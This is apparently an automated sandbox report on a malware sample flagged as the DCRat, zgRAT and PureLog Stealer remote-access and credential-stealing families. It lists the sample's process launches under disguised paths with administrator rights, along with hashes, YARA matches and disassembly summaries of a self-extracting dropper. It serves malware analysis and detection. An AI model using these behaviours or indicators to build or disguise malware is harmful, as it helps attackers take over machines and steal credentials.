File size:	2'030'080 bytes
MD5 hash:	53D61BC60C85CB1647B5556C4225FB86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2570123434.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2570123434.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2570123434.000000000330C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2570123434.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2570123434.0000000003652000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	03:12:57
Start date:	10/12/2024
Path:	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe"
Imagebase:	0x10000
File size:	2'030'080 bytes
MD5 hash:	53D61BC60C85CB1647B5556C4225FB86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:12:58
Start date:	10/12/2024
Path:	C:\ServerfontSessiondhcpcommon\System.exe
Wow64 process (32bit):	false
Commandline:	C:\ServerfontSessiondhcpcommon\System.exe
Imagebase:	0x40000
File size:	2'030'080 bytes
MD5 hash:	53D61BC60C85CB1647B5556C4225FB86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ServerfontSessiondhcpcommon\System.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ServerfontSessiondhcpcommon\System.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:12:58
Start date:	10/12/2024
Path:	C:\ServerfontSessiondhcpcommon\System.exe
Wow64 process (32bit):	false
Commandline:	C:\ServerfontSessiondhcpcommon\System.exe
Imagebase:	0xf30000
File size:	2'030'080 bytes
MD5 hash:	53D61BC60C85CB1647B5556C4225FB86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	03:13:05
Start date:	10/12/2024
Path:	C:\ServerfontSessiondhcpcommon\System.exe
Wow64 process (32bit):	false
Commandline:	"C:\ServerfontSessiondhcpcommon\System.exe"
Imagebase:	0x970000
File size:	2'030'080 bytes
MD5 hash:	53D61BC60C85CB1647B5556C4225FB86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFAAC2B0C91 Relevance: 5.3, Strings: 4, Instructions: 273COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC2B0DE7
b4, xrefs: 00007FFAAC2B0E57
"9, xrefs: 00007FFAAC2B0D11
r6, xrefs: 00007FFAAC2B0E05

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID: "9$b4$r6$r6
API String ID: 0-2382298496
Opcode ID: 908f5e31d93a78f9b2bf37fc89d8778e5026b10f56ce9b840c650ffa1a89525d
Instruction ID: 8fb62d51311f9d72f92805e5ff86a00f46e740f23d93ba108ed96fbabc3305df
Opcode Fuzzy Hash: 908f5e31d93a78f9b2bf37fc89d8778e5026b10f56ce9b840c650ffa1a89525d
Instruction Fuzzy Hash: B89102B1A18A498FE785DB6CD4A57E9BFE1FB9A310F0040BAE04DE73D6DE7458098740

Function 00007FFAAC2B0928 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC2DA559
X, xrefs: 00007FFAAC2DA380
p[, xrefs: 00007FFAAC2DA63D

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID: X$p[$r6
API String ID: 0-766787601
Opcode ID: c1a8d3bc54bbc2b025b7cf1a19612f9ef16e4cb87578212435267c70ce65c6ba
Instruction ID: 231fbf7cb9545a0a4d41bfd4af86b3b3f123f07fe9d55653a1623d21642b5ad1
Opcode Fuzzy Hash: c1a8d3bc54bbc2b025b7cf1a19612f9ef16e4cb87578212435267c70ce65c6ba
Instruction Fuzzy Hash: 66A1B871A18A09CFEB45EB2CC455AA977E1FFA9300F50457AE04ED7296DF38E846C780

Function 00007FFAAC2B0908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a7c28d6b210531e474a737ed60c40c677894df73c9cee8f0a9c254d98332d18
Instruction ID: c155e6df74ea1926e694c3a499a98429952743cee35c8854531fbd2b2d6b6d19
Opcode Fuzzy Hash: 9a7c28d6b210531e474a737ed60c40c677894df73c9cee8f0a9c254d98332d18
Instruction Fuzzy Hash: 4221E93131DC184FE768EB0CE889DB573D1EB5932131101BAE59EC7226E911EC8687C1

Function 00007FFAAC2B497B Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5669c3c98f67f8f60383764cb59be3e60dc3c306a588c3dd8f8532ed7b1ab76e
Instruction ID: 9e8b50b21adc738be74c669d2e3430c09544b3eb24117bdbeafbaecbafcbb6c9
Opcode Fuzzy Hash: 5669c3c98f67f8f60383764cb59be3e60dc3c306a588c3dd8f8532ed7b1ab76e
Instruction Fuzzy Hash: 49310E60A19919CFFB95FB2884957B86291FF5A300F4481B5D40EE7397DE38ED4C8784

Function 00007FFAAC2B0998 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24c7a1657b8fbec170695533c3d992a658d5ad8df9e819da5154c7a21be5fa5
Instruction ID: 53e1da7c4c7ddf091307456b89c9d90f774002740ee00a4b8a88d3de4ba4baca
Opcode Fuzzy Hash: a24c7a1657b8fbec170695533c3d992a658d5ad8df9e819da5154c7a21be5fa5
Instruction Fuzzy Hash: 10210820B2891D4FF788F72C9459A7A76C6EB99311F4044B9E44EC33E7DD14EC0682C5

Function 00007FFAAC2B5924 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5303338921094aa94a14492bf1da0cb6b185f9163ea430e93e936fbd80453274
Instruction ID: eb3d9d9b1ebd5c5eac832f9fa9642bbfaed93b1ac29d22b927487771ce6e472c
Opcode Fuzzy Hash: 5303338921094aa94a14492bf1da0cb6b185f9163ea430e93e936fbd80453274
Instruction Fuzzy Hash: 4E115E30908908CFEF68EB08C495BA977E0FB69310F14417DD44EE7395CB34A989CB81

Function 00007FFAAC2B0C40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3e57f36ef8451e424950adba16cb22cb78d39398c7286367fa06ad698c3fe4
Instruction ID: 7591570daf018b9386e86666cb3fbc644b8be8f3ee504186c76ee465cc97d8c3
Opcode Fuzzy Hash: 6f3e57f36ef8451e424950adba16cb22cb78d39398c7286367fa06ad698c3fe4
Instruction Fuzzy Hash: 03F06DA280E7C98AF313777558220E87F20AF83220B09C0F3D58C8B1A3D919A81D83D2

Function 00007FFAAC2B4AB2 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a709021d220b071ac6a1e6372993c14bd476a3450681f698d7ebca3ad5cdb79b
Instruction ID: 098a8a11a14f50323e379fd36e14e825f03290dfea42b29c7916cbca0bbbf6f7
Opcode Fuzzy Hash: a709021d220b071ac6a1e6372993c14bd476a3450681f698d7ebca3ad5cdb79b
Instruction Fuzzy Hash: B4F03C3091991ACAFB51FB14C8957F873A1FB56301F1081B6D90DD3396DE38AE8D8B84

Function 00007FFAAC2B6160 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c6f18d9d53830601e0e9efbd3d53b832dec330b10c3e959777cf3421ff83d2
Instruction ID: be767c633f750049a57ff9ef4049ed2ba222ac7b332894e3e9fd57dc7b493a19
Opcode Fuzzy Hash: b8c6f18d9d53830601e0e9efbd3d53b832dec330b10c3e959777cf3421ff83d2
Instruction Fuzzy Hash: 30F0A0A0E0A92A8AF6E8B70C84882B912D1AB09300F14C131D04ED378BDD2CEC4E07C0

Function 00007FFAAC2B0C48 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f086d74ad26e042f14e8ba7e72dba9db29b51557e0f4577408453b3db025d77
Instruction ID: f86ad963804872da49ca3c8c82e175c5c6d408cc5f9fbe683c13533965464da9
Opcode Fuzzy Hash: 2f086d74ad26e042f14e8ba7e72dba9db29b51557e0f4577408453b3db025d77
Instruction Fuzzy Hash: 1FF08CA280E7C98EF323777458620E87F209F43210F0AC0F7E49C8A1A3DD09A91D83D2

Function 00007FFAAC2B208A Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9403870f26fffae4f9d0577de1ac8f971dd1ea218d819b3d6befc3c5a83be0e
Instruction ID: 041b78833c72256a33c0df48656582ccaff71aaeebaa1aeec343574efdaaffce
Opcode Fuzzy Hash: b9403870f26fffae4f9d0577de1ac8f971dd1ea218d819b3d6befc3c5a83be0e
Instruction Fuzzy Hash: C0E06D64E59D2ACAF6E8F70C84892B922D2EB59300F508175D00EC338BDE28EC4E53C0

Function 00007FFAAC2B1911 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b437104899ee1c34b0f8c9079c78493aefdec2ffcbf3e9470cd9ee3294982b2
Instruction ID: c4b36d2119033886de5018a3eb8c78943a8952117ac0bd38cd7039a579a104ae
Opcode Fuzzy Hash: 6b437104899ee1c34b0f8c9079c78493aefdec2ffcbf3e9470cd9ee3294982b2
Instruction Fuzzy Hash: 3AE03920E0A41ACBF795B714C4503F923A1DF4A300F2480B5D94D9338BDD29ED4E8784

Function 00007FFAAC2B0C50 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff04f914b1afa66da489361c8d599bb60f6197debf59b5791eacc7010fb1c72c
Instruction ID: 7b6e4f9c4fac4cc9d0d083daa662323e469cbf88c3941375c61f322ec6722984
Opcode Fuzzy Hash: ff04f914b1afa66da489361c8d599bb60f6197debf59b5791eacc7010fb1c72c
Instruction Fuzzy Hash: 75E039A280E7C98AF323737408620E87F209F43210F4980F3E49C8A1A7DD49A91C8392

Function 00007FFAAC2B06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a1ca0eed7eef7795817160075d15c470614e9d3c31617ba283944c6d80d9c0
Instruction ID: 3274aa722f2f81ce985b48cf836508b2bde7c35981bc6af7a7d2c78cc645e64f
Opcode Fuzzy Hash: 01a1ca0eed7eef7795817160075d15c470614e9d3c31617ba283944c6d80d9c0
Instruction Fuzzy Hash: D5C04C45D5B91B81B456736E59460ECA140ABDB710FD5C572D54C502CBAC4DE0DD02D6

Function 00007FFAAC2B06F8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb703b08d85fed3ef342e924ed8911b2011a29dc332dca4680da4e00e91660e
Instruction ID: f2f568f43373992b9d73fb04eee1f75ba8b8fc07cb7b2618bc4b802755957061
Opcode Fuzzy Hash: 3fb703b08d85fed3ef342e924ed8911b2011a29dc332dca4680da4e00e91660e
Instruction Fuzzy Hash: 95C04C345519098FD944FB2DC88595476A0FB1A215BD50090E40DC7279E65AEC99C781

Function 00007FFAAC2B0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27ddfc23219f49c870fd759eec89d97c2a0ee39a9691f7dca4f8c834cbe9c340
Instruction ID: a0d2d02fe329e11f17f995178dd607ef04170a206aac3b013a2d6020adc19bd6
Opcode Fuzzy Hash: 27ddfc23219f49c870fd759eec89d97c2a0ee39a9691f7dca4f8c834cbe9c340
Instruction Fuzzy Hash: DDC04C30511819CFDA44F72DC98595476A0FB0E215FD501A0E40DCB275E65ADC99C741

Function 00007FFAAC2B06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1441448600.00007FFAAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC2B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffaac2b0000_Dfim58cp4J.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5377d297c480efdd9ac09c8813067c0891aca681d456493c417e87b77effbb76
Instruction ID: 5c384280e7a135e5e723181092d07f66157cb43197b3dd4f64ad8c61932a48d4
Opcode Fuzzy Hash: 5377d297c480efdd9ac09c8813067c0891aca681d456493c417e87b77effbb76
Instruction Fuzzy Hash: 9EB01200C5780F40B444337A0D420A870406B4E300FC48070D40C5028BA84D509C03D3

Analysis Process: DC.exePID: 4220, Parent PID: 4656COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.1%
Total number of Nodes:	1485
Total number of Limit Nodes:	46

Executed Functions

Function 00BEDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BE0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00BE087C
Part of subcall function 00BE0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BE088E
Part of subcall function 00BE0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BE08BF

Part of subcall function 00BEA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00BEA655

Part of subcall function 00BEAC16: OleInitialize.OLE32(00000000), ref: 00BEAC2F
Part of subcall function 00BEAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BEAC66
Part of subcall function 00BEAC16: SHGetMalloc.SHELL32(00C18438), ref: 00BEAC70

GetCommandLineW.KERNEL32 ref: 00BEDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00BEDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00BEDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00BEDFCE

Part of subcall function 00BEDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BEDBF4
Part of subcall function 00BEDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BEDC30

CloseHandle.KERNEL32(00000000), ref: 00BEDFD7
GetModuleFileNameW.KERNEL32(00000000,00C2EC90,00000800), ref: 00BEDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00C2EC90), ref: 00BEDFFE
GetLocalTime.KERNEL32(?), ref: 00BEE009
_swprintf.LIBCMT ref: 00BEE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00BEE05A
GetModuleHandleW.KERNEL32(00000000), ref: 00BEE061
LoadIconW.USER32(00000000,00000064), ref: 00BEE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00BEE0C9
Sleep.KERNEL32(?), ref: 00BEE0F7
DeleteObject.GDI32 ref: 00BEE130
DeleteObject.GDI32(?), ref: 00BEE140
CloseHandle.KERNEL32 ref: 00BEE183

Strings

winrarsfxmappingfile.tmp, xrefs: 00BEDF77
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00BEE039
STARTDLG, xrefs: 00BEE0BE
sfxstime, xrefs: 00BEE055
C:\Users\user\Desktop, xrefs: 00BEDF33
sfxname, xrefs: 00BEDFF9

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-433059772
Opcode ID: 9a7dfec3bb29075393ca6d3b44ead0cf2f87dd30cb9ea8bb1458cd283765f501
Instruction ID: 14307a033685ab4190f9ad354ab210b27b2d4a1de0e311242aacbe68dfa36558
Opcode Fuzzy Hash: 9a7dfec3bb29075393ca6d3b44ead0cf2f87dd30cb9ea8bb1458cd283765f501
Instruction Fuzzy Hash: 9561F5719083C5AFD320AB76EC89F6F77ECEB49704F040469F945A2291DB78D944C7A2

Function 00BEA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6D5
SizeofResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6EC
LoadResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA703
LockResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BEB73D,00000066), ref: 00BEA72D
GlobalLock.KERNEL32(00000000), ref: 00BEA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BEA762
GlobalUnlock.KERNEL32(00000000), ref: 00BEA7C6

Part of subcall function 00BEA626: GdipAlloc.GDIPLUS(00000010), ref: 00BEA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BEA7A7
GlobalFree.KERNEL32(00000000), ref: 00BEA7CD

Strings

PNG, xrefs: 00BEA6C6

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 8ad2f997b718637d6b8979f3da2afa7ce4ee58d174c667ca14c59dfbbc784740
Instruction ID: fc31025ad47de5ce9f2171f3f36f7a073c3dc4f32535f6cd4f9ad3593652619c
Opcode Fuzzy Hash: 8ad2f997b718637d6b8979f3da2afa7ce4ee58d174c667ca14c59dfbbc784740
Instruction Fuzzy Hash: 04316D75601382AFD7109F22EC88F2F7BFDEF89750B050559F90582661EB31ED44CAA1

Function 00BDA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6C4

Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA728
GetLastError.KERNEL32(?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA734

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 45d2895305d0e3fae8e3ce39250134c795d07eb781265f3abb47ce9ec50164e5
Instruction ID: aae56e00dc0a37d37999bc6bdfdb02a759d4ed4b8b1670a00b0d16f43bb92ea1
Opcode Fuzzy Hash: 45d2895305d0e3fae8e3ce39250134c795d07eb781265f3abb47ce9ec50164e5
Instruction Fuzzy Hash: CF416C72901555ABCB25DF68CC88BEAF7F8FB48350F104196E969E3200E734AE94CF91

Function 00BF7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002,00000000), ref: 00BF7E0F
TerminateProcess.KERNEL32(00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002,00000000), ref: 00BF7E16
ExitProcess.KERNEL32 ref: 00BF7E28

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 1336b20996d806a632429f0e0ab2f731c02d2a7929e02b0c4dc080c3f5890fa8
Instruction ID: 82a93a17879b5aa00587779936ca22b09fcb7fe7875c4e40c711ca17fad5e5f2
Opcode Fuzzy Hash: 1336b20996d806a632429f0e0ab2f731c02d2a7929e02b0c4dc080c3f5890fa8
